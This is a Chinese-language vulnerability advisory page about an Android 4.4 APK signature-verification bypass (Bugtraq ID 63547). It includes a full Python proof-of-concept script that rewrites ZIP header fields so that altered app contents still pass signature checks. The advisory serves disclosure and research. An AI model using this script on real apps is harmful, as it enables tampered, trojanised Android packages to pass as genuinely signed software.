Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Google Android签名验证安全措施绕过漏洞

发布日期:2013-11-04
更新日期:2013-11-07受影响系统:
Google Android
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 63547Android是基于Linux开放性内核的操作系统,是Google公司在2007年11月5日公布的手机操作系统。Android 4.4及其他版本存在安全限制绕过漏洞,攻击者可利用此漏洞绕过某些安全限制以执行未授权操作。<*来源:Jay Freeman
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/pythonimport zipfile
import struct
import sys# usage: ./pocB.py new.apk old.apk file data
zout = zipfile.ZipFile(sys.argv[1], "w")
zin = zipfile.ZipFile(sys.argv[2], "r")
replace = sys.argv[3]
new = open(sys.argv[4], "r").read()fp = zout.fpfor name in zin.namelist():
    old = zin.read(name)
    if name != replace:
        zout.writestr(name, old, zipfile.ZIP_DEFLATED)
    else:
        assert len(new) <= len(old)        # write header, old data, and record offset
        zout.writestr(name, old, zipfile.ZIP_STORED)
        offset = fp.tell()        # return to name length, set to skip old data
        fp.seek(-len(old) -len(name) -4, 1)
        fp.write(struct.pack("<h", len(name) + len(old)))        # after old data, write new data padded
        fp.seek(offset)
        fp.write(new)
        fp.write("" * (len(old) - len(new)))zout.close()
zin.close()建议:
--------------------------------------------------------------------------------
厂商补丁:Google
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:推荐阅读:Android 4.4 开放短信 API 接口,第三方应用迎来春天 http://www.linuxidc.com/Linux/2013-10/91436.htm“Android 4.4”开箱图赏 http://www.linuxidc.com/Linux/2013-09/90398.htmAndroid 4.4 出现漏洞 黑客能远程遥控手机 http://www.linuxidc.com/Linux/2013-11/92371.htm更多Android相关信息见Android 专题页面 http://www.linuxidc.com/topicnews.aspx?tid=11McAfee Email Gateway命令注入漏洞ReviewBoard脚本插入漏洞(CVE-2013-4519)相关资讯      Android 4.4  Android 4.4漏洞 
  • Google停止为Android 4.4之前版本  (01/12/2015 21:32:59)
  • 在Linux上安装Android 4.4 KitKat  (08/23/2014 06:56:53)
  • 在Ubuntu上下载Google Android4.4  (08/09/2014 07:44:07)
  • Android 碎片化未见好转,4.4 版本  (11/05/2014 09:36:06)
  • Android 4.4 蓝牙源码部分分析  (08/09/2014 07:48:37)
  • Android 4.4 全套源码及子模块源码  (08/09/2014 06:58:06)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
    • <
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图